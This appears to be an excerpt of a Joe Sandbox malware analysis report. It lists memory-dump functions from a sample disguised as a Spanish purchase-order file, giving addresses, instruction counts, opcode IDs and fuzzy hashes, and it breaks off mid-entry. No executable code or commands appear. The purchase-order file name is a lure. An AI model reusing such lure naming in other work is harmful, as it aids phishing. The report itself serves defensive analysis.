Instruction ID: 1ba521f0235a3da9b593db43a6a0f059c26c856dc542ff04bc220bfb2d44bc71
Opcode Fuzzy Hash: 107dec24d5628fe4c35685e96670398139d41230ca747b895061b420ce910c08
Instruction Fuzzy Hash: 07D1D270A146188BEB08BBBCD85866E7BB6FFC9700F408969D145E7354DF389D09C7A2

Function 06B7BD20 Relevance: .4, Instructions: 366COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1544664755.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b70000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 053d03e9c22d7ab772f7146bd8dac98a337267e62cb7b9a9625605224e74d009
Instruction ID: 6ef7b0d20be1ccd1df98faf8fc553d8ac659c98e6bdb89dfabb8f152f2fb64e9
Opcode Fuzzy Hash: 053d03e9c22d7ab772f7146bd8dac98a337267e62cb7b9a9625605224e74d009
Instruction Fuzzy Hash: 63C1AD71A10614CFDB04BBBCE88952E7FB2BB88A00F41496DE545A3358DF399C4AD791

Function 0214C360 Relevance: .3, Instructions: 308COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1532600831.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd27fe6b4e59b3f9221a7c60435cd54464515d61a1b9d17121b520948d780f26
Instruction ID: f5f2eaf23768b9241189fb3cf66375a70b2010215b7a366a45dea47c221a07e3
Opcode Fuzzy Hash: dd27fe6b4e59b3f9221a7c60435cd54464515d61a1b9d17121b520948d780f26
Instruction Fuzzy Hash: 4EB1AE70B40209CFD7189BA9C854B6EB7A7FFC8700F24846AE51AAB394DF749C01DB95

Function 02145EB0 Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1532600831.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8aaa01bbdd214491a9b7860d2ce1c553cb96cd542f54dbe5dd722dd1e669cb1
Instruction ID: e84c53c026573e0e04af279203bcb0ba88b6cad70c69bc962dcfec23dfcb2010
Opcode Fuzzy Hash: d8aaa01bbdd214491a9b7860d2ce1c553cb96cd542f54dbe5dd722dd1e669cb1
Instruction Fuzzy Hash: F4B1D370B40249DFEB149BB9C84477EB6E6BBC9704F218469E50AAB385CF75CC41C7A1

Function 0752CF90 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe5c76b0b92a6698ca8aad5daf1dfcf834addebb579f9e55a3e3dbf95452d234
Instruction ID: bbec0ff62b11fa5b798e1a12142158b3fdaffd5255c45e0a7b7a85d8d934ed78
Opcode Fuzzy Hash: fe5c76b0b92a6698ca8aad5daf1dfcf834addebb579f9e55a3e3dbf95452d234
Instruction Fuzzy Hash: F2C10574700215CFDB14DF68D598A9DBBF2BF8A310B1585A9E506EB3A1DB31EC42CB50

Function 06B7BCD7 Relevance: .3, Instructions: 291COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1544664755.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b70000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ee28345f1256d8a041541b93b27f6039f9266ec06bd79e68934b58e0cb39c31
Instruction ID: 12cf0bb9aca6bfe0ef78918b624f0f8aa6494c1d1b4aabecff043f8660e88e4c
Opcode Fuzzy Hash: 4ee28345f1256d8a041541b93b27f6039f9266ec06bd79e68934b58e0cb39c31
Instruction Fuzzy Hash: BBA1BD71A006148FDB04BFBCE88862E7FB2EF89600F4449ADD545A3394DF39AC4AD791

Function 06B7CFF1 Relevance: .3, Instructions: 286COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1544664755.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b70000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9ee229737c9e17a6e5a75c141849798d60cc994527b819b6198a86951895379
Instruction ID: 5ffe77a7e5efdd124bf4d2a9ebffffa50b4a850751a2b1fcc0e97b8e0e5d6279
Opcode Fuzzy Hash: c9ee229737c9e17a6e5a75c141849798d60cc994527b819b6198a86951895379
Instruction Fuzzy Hash: 5CA1B170A102188FEB14BBBCD888A6D7BB2FF89744F814969E449E3354DF389C09D761

Function 06B7BD11 Relevance: .3, Instructions: 274COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1544664755.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b70000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8b9cb4049693a74fc6d994ee0073e99118ea35aea8abdbe66e40eb7775fb906
Instruction ID: 06e2c8efcc9f539224682452e1769dacbf36a109b929a44de263eebf22199f2c
Opcode Fuzzy Hash: a8b9cb4049693a74fc6d994ee0073e99118ea35aea8abdbe66e40eb7775fb906
Instruction Fuzzy Hash: 2791BD71A00614CFDB04BBBCE88862E7FB2FB88600F41496DE945A3354DF39AC4AD791

Function 02149210 Relevance: .3, Instructions: 273COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1532600831.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92da8760b6fa7f568e07061269a2a9cb382e73c0cafa9de75b07e31e0a1cb2e1
Instruction ID: 3fa83646e85a232fad92de19f4e781412fa8475900fa03f350599dd6da46f1ad
Opcode Fuzzy Hash: 92da8760b6fa7f568e07061269a2a9cb382e73c0cafa9de75b07e31e0a1cb2e1
Instruction Fuzzy Hash: 0AC13D70A402089FCB14CFA9D984E9EBBF2FF89314F158559E819AB261DB35ED41CF50

Function 02145EA0 Relevance: .3, Instructions: 271COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1532600831.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bb8f7e7176c2c4d55fbfec96c1b7617dde8cb5b2014967e0869e63ee50beba4
Instruction ID: c869f29efc2bc97149df39a85d34341d6e87ec1e9839a8837352371558f1476a
Opcode Fuzzy Hash: 5bb8f7e7176c2c4d55fbfec96c1b7617dde8cb5b2014967e0869e63ee50beba4
Instruction Fuzzy Hash: 2BA1D370B40248DFEB249BB9C84476EB7E6BBC9704F248469E509AB395CF79CC41CB91

Function 06B7D000 Relevance: .3, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1544664755.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b70000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efe670865942d1d12d4f5124bbdc3ec7f3abef664eb29263d370d6e76f6aa175
Instruction ID: 06f6ddb809fc9b3b2767927ae7fe2638a88249d35ce3222f0c5ab92215b7a0a2
Opcode Fuzzy Hash: efe670865942d1d12d4f5124bbdc3ec7f3abef664eb29263d370d6e76f6aa175
Instruction Fuzzy Hash: 6291B370A10218CBEB14BBBDD888A6D7BB2FF88744F814969E445E3354DF389C19D761

Function 06B71748 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1544664755.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b70000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b1d1a5aeff8b571913f947aa68822455219bc2c9061c12eb8ad8e334d05841c
Instruction ID: 435556a458a41fc59892a75af503230731ea1c7964a135927af60abc80118f1a
Opcode Fuzzy Hash: 6b1d1a5aeff8b571913f947aa68822455219bc2c9061c12eb8ad8e334d05841c
Instruction Fuzzy Hash: 21A16D70D00708DFDB14DFA9C84479EBBF6EF89310F14856AE419BB250DB74A985CBA1

Function 0214B740 Relevance: .3, Instructions: 253COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1532600831.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 416db07fb3c7e77e1de44c00a9b476602d9593a6ae2fbcb64e24c200ff58c34e
Instruction ID: 2fa2eb16702b8bca91a71b1e449c5a797923a55539dea9bb4b840fa042b2b8f7
Opcode Fuzzy Hash: 416db07fb3c7e77e1de44c00a9b476602d9593a6ae2fbcb64e24c200ff58c34e
Instruction Fuzzy Hash: 11A19171A48216DFCB15DF68D494EAE7BB1FF48318F068069E8199B3A1CB31ED51CB90

Function 06B7C936 Relevance: .2, Instructions: 243COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1544664755.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b70000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b6b8049d94b7e7abfa3442ffe59f1f51ebe4e4816b3aa93cc6851b6b0e116ea
Instruction ID: 5aa2b3fd7ca9c9de19bfb76f96b213169108684334dc14dd7b7f74b53c381839
Opcode Fuzzy Hash: 9b6b8049d94b7e7abfa3442ffe59f1f51ebe4e4816b3aa93cc6851b6b0e116ea
Instruction Fuzzy Hash: DE713770A093848FD306AB78985862D7FB1EF82604F4545EFD581D72A7CB385D0DC3A2

Function 0752CBA0 Relevance: .2, Instructions: 242COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a600750b97988281733fb194e2d65361c252a28347571236cf9bf7e2fa6db1c
Instruction ID: f03ea0cbc7ca84f2c825e2e3222a7183117eaa872260893c3ce4635b7b6d141c
Opcode Fuzzy Hash: 5a600750b97988281733fb194e2d65361c252a28347571236cf9bf7e2fa6db1c
Instruction Fuzzy Hash: 145147707002169FEB55DB64D894BA9B7F2BF8A700F14816AE406DB3A1DB30EC46DB91

Function 02144577 Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1532600831.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d25aec564bff516391207baaa55583bd2a81fa03f73841bafeed9491e185d791
Instruction ID: 707fdd9001c64c20dae7ca742e364c02fe4ec4046a87eaf6f840cc9caec53121
Opcode Fuzzy Hash: d25aec564bff516391207baaa55583bd2a81fa03f73841bafeed9491e185d791
Instruction Fuzzy Hash: 3281F570A892A4CFF7248B68D8547A977B1EB85300F168476D45AEF2D2CF38CC45CB96

Function 021480A0 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1532600831.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 643e459ad4691a0943dde241b3a47654b74fa54d05bbc42569f8b6b674311b06
Instruction ID: ca6eb4a5f5ad9b607afea8886f3d67044a0f81b679ab79c9dbe7a26a45efd5f5
Opcode Fuzzy Hash: 643e459ad4691a0943dde241b3a47654b74fa54d05bbc42569f8b6b674311b06
Instruction Fuzzy Hash: 5C819030B80905CFDB18DFA9DC84A6AB7F2BF89314B168169D819EB365DB31EC41CB51

Function 0214D428 Relevance: .2, Instructions: 228COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1532600831.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: faa814c68848d38a2d16801a23141369f350b6d8b8b5820491cc5cd86a67dfc8
Instruction ID: c0f3f12a1ae9cafa47b8b806873f829030574aad88cf640273692798d722ec79
Opcode Fuzzy Hash: faa814c68848d38a2d16801a23141369f350b6d8b8b5820491cc5cd86a67dfc8
Instruction Fuzzy Hash: 0C815A707802058FCF15DF28D894A6A7BF6AF89644F1A40A9E819CB3B1DF75DC42CB91

Function 021445F0 Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1532600831.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2522de4b7481e6fd7a1a30aaea439321af7757862429a890200dc327907f5380
Instruction ID: d7b5b34d214c0554ae79a980822f1be77297dfe467e4a7096f09293f8a91906e
Opcode Fuzzy Hash: 2522de4b7481e6fd7a1a30aaea439321af7757862429a890200dc327907f5380
Instruction Fuzzy Hash: 3571B474B44269CBE7288AA8D4547BE76F6EB84301F168436D41AEB394CF74CC41DBE2

Function 0752A7EF Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec4f5189838f81ce25465031cdb6f1e7052c5070d0f578c6e1015cc4bbbf431f
Instruction ID: 441b580e17bb723261693dd7deeba228ae25e201bd7a337a20f6a13cb1d24089
Opcode Fuzzy Hash: ec4f5189838f81ce25465031cdb6f1e7052c5070d0f578c6e1015cc4bbbf431f
Instruction Fuzzy Hash: B1A1F6B4600215DFDB58CF68D888BA877B1FF4A315F5581B9E8059B2A2CB34EC86DF50

Function 07520040 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d46342f377c06673f6cd4e21deb9854925da30952e5d10755f20ca223683ad4f
Instruction ID: d4cccd3e165c1bd8813170e0a672a5852333712f933b660403e6a3d3cd5f8269
Opcode Fuzzy Hash: d46342f377c06673f6cd4e21deb9854925da30952e5d10755f20ca223683ad4f
Instruction Fuzzy Hash: F981E574710614CFDB04EF28D598DA97BF6BF89A04B1541AAE506CB3B5DB71EC06CB80

Function 0752A82A Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1145e65a2066119a266c4def6556a4f26131cd0c5cbe3e00d85f6f540680104
Instruction ID: fdda45cf342e3a4640228c638cc0645c34ec13fe7d04a8c37b86566fe347fd19
Opcode Fuzzy Hash: e1145e65a2066119a266c4def6556a4f26131cd0c5cbe3e00d85f6f540680104
Instruction Fuzzy Hash: 8AA105B4600205DFDB14DF68D888FA977B1FF4A315F1581A9E8099B2A2CB30EC86DB50

Function 0752FAB0 Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48fadec1ab024a2debf0bdcaa5a7fd711c6e1a957c650a05fff822b1f1175d14
Instruction ID: 1ac67ceff8577b31f3a21a9040e493481fe6dc5214d444262d190130608babec
Opcode Fuzzy Hash: 48fadec1ab024a2debf0bdcaa5a7fd711c6e1a957c650a05fff822b1f1175d14
Instruction Fuzzy Hash: DB818FF0A002168FDB24CF68E440BEAB7B6FF86314F14896AD815A72E0D731E843DB51

Function 02149FA8 Relevance: .2, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1532600831.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f9d3f953d14581c3cc0d4d47755baab32cb17a07277cb8ca6db3e95f882f7ed
Instruction ID: 6137828b65179337e1d78223a7014f9081d69202b57705d243c31f6d1db65b8b
Opcode Fuzzy Hash: 6f9d3f953d14581c3cc0d4d47755baab32cb17a07277cb8ca6db3e95f882f7ed
Instruction Fuzzy Hash: B56190313C41118FD718DF79C9A4A6A7BE9FF8864470A44A9E41ACB3A5EF31EC01CB61

Function 0214F9E0 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1532600831.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0ffc5f3759dc1deda13e35b14552ad2edf4346329e83821862751b39cd92dc9
Instruction ID: 9c8d4905a27be7c983a837a05e5ab21249055636bc872686750e832d2e86d18e
Opcode Fuzzy Hash: e0ffc5f3759dc1deda13e35b14552ad2edf4346329e83821862751b39cd92dc9
Instruction Fuzzy Hash: 1C21E470785245CFE3049B78C9157763BA2AB85204F28C0BAE1198F7A6DF76CC078791

Function 0752CBC0 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 471bc280d2e8ebf2a7a6a331be82a2d58fdeced154cb90f59c5d9d5eb29b7a68
Instruction ID: 0302ce58ddc4330e7e0298da2aa65f12c6da5a238c9d45fdcaac863a590387eb
Opcode Fuzzy Hash: 471bc280d2e8ebf2a7a6a331be82a2d58fdeced154cb90f59c5d9d5eb29b7a68
Instruction Fuzzy Hash: 5A712A70200615CFDB14DF68C898EA977F1BF8A214F1585A9E44ADB3B2DB30EC46CB61

Function 06B7C9A4 Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1544664755.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b70000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8991dff5473edf3ce8e3bf95339717739a067a43203f1842ef436d0f51b46cff
Instruction ID: aca98dd9b56d52370a27531822c43e4a8ca9fd11e0062a6dee381b91a767be85
Opcode Fuzzy Hash: 8991dff5473edf3ce8e3bf95339717739a067a43203f1842ef436d0f51b46cff
Instruction Fuzzy Hash: F3512970A04249CFE704BBBCD89966E7FB2EF85600F4144AED185D7395DF345949C3A2

Function 075244D0 Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f9fc044b3c4eaa0fced4ab438d4bddf72089ce722046f2ce9997fc4f3cddff6
Instruction ID: b7010350ba059694c26a3a3e6c6054b13593b9b358ba18612c48fcfaf49303d7
Opcode Fuzzy Hash: 2f9fc044b3c4eaa0fced4ab438d4bddf72089ce722046f2ce9997fc4f3cddff6
Instruction Fuzzy Hash: 3A5146716046509FD715EB68C454AF977A6FFC6300F1884ABE009EB391DA35AC43DBA1

Function 06B7D638 Relevance: .2, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1544664755.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b70000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 980c6f381124115f6c04880daefd0850eb8e4b2e8b4e403cc86685fdbfd83d25
Instruction ID: 0a6b365d030e894f497ec31e9d4b4813702b7766462598454a28f789b50863ec
Opcode Fuzzy Hash: 980c6f381124115f6c04880daefd0850eb8e4b2e8b4e403cc86685fdbfd83d25
Instruction Fuzzy Hash: 5051D171B046048FE704FBBCE88856CBFB2EF89650F4484AAD484E7259CF349C19D7A1

Function 06B7C9E7 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1544664755.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b70000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98cac16e039e988cbfc2310ee3d816a6a2aaa129ab126aaec7b5d0262b017d45
Instruction ID: 909c19f1b2133b7589b87195b3cc42788f1ea5cf5ccb86063c611b29e3a45d9f
Opcode Fuzzy Hash: 98cac16e039e988cbfc2310ee3d816a6a2aaa129ab126aaec7b5d0262b017d45
Instruction Fuzzy Hash: 5851F770B04209CFE704BBBCD89962E7FB2AB85600F4048AEE185E7354DF345D49C3A2

Function 07521C78 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a813adb2c60733085e7651be64d0a2c1e372967595a7695dcda3860c704c999a
Instruction ID: 73a8336aeab2d953e133f3efa7c903e9c26cc9a76fc68022bfa82569ee8be071
Opcode Fuzzy Hash: a813adb2c60733085e7651be64d0a2c1e372967595a7695dcda3860c704c999a
Instruction Fuzzy Hash: A751C276A0091ADFDF04CF64D840AEFB7B6FF86714F058466E905AB2A1DB35E906CB40

Function 06B7D670 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1544664755.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b70000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13c117655e842004866cbc7818cd29bc158b60c184ad58da7f61d2d3e3b7f4b3
Instruction ID: 2015ad4459bb05605882a7741bcc7086dbd280b81a6a21106129327b7b7b1b93
Opcode Fuzzy Hash: 13c117655e842004866cbc7818cd29bc158b60c184ad58da7f61d2d3e3b7f4b3
Instruction Fuzzy Hash: ED51DFB1A102048BE704FFBDE88856DBFB2EF89650F448569E448E3358DF349C1AD7A1

Function 075279E0 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a9ef6b0dd5abd415e678ad831fc6af40bd1097a05df460b6484348d61118229
Instruction ID: 851d7d93fd94c215d49affadbd528e5074767c7cb521bbed9f0ed83f3d2906be
Opcode Fuzzy Hash: 1a9ef6b0dd5abd415e678ad831fc6af40bd1097a05df460b6484348d61118229
Instruction Fuzzy Hash: A151E2717002118FE715EBA8D454AEE7BE6FF8A214F14486AD109EB3A1CB75EC46CB90

Function 06B7CA10 Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1544664755.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b70000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c330e6fd7056abc144a6825139965b8bb21a2357541b377de8bff0db5e4d3240
Instruction ID: bd9a3fce5419ea07c0eef0c4e556d17bdc6cc49113edd81dd2d81acba27610de
Opcode Fuzzy Hash: c330e6fd7056abc144a6825139965b8bb21a2357541b377de8bff0db5e4d3240
Instruction Fuzzy Hash: C5419370B10209CBE708BBBDE589A2E7FB6FB84A04F40496DE245E3354DF346949D7A1

Function 0752FD37 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0583884d77526ecc325db4f181f89619eca69e4e2518e190185c00c19973221d
Instruction ID: f5ba336f63a2eba81d39e7a045b7bfbe5e0c22466ed6784e14880b71cab71ce0
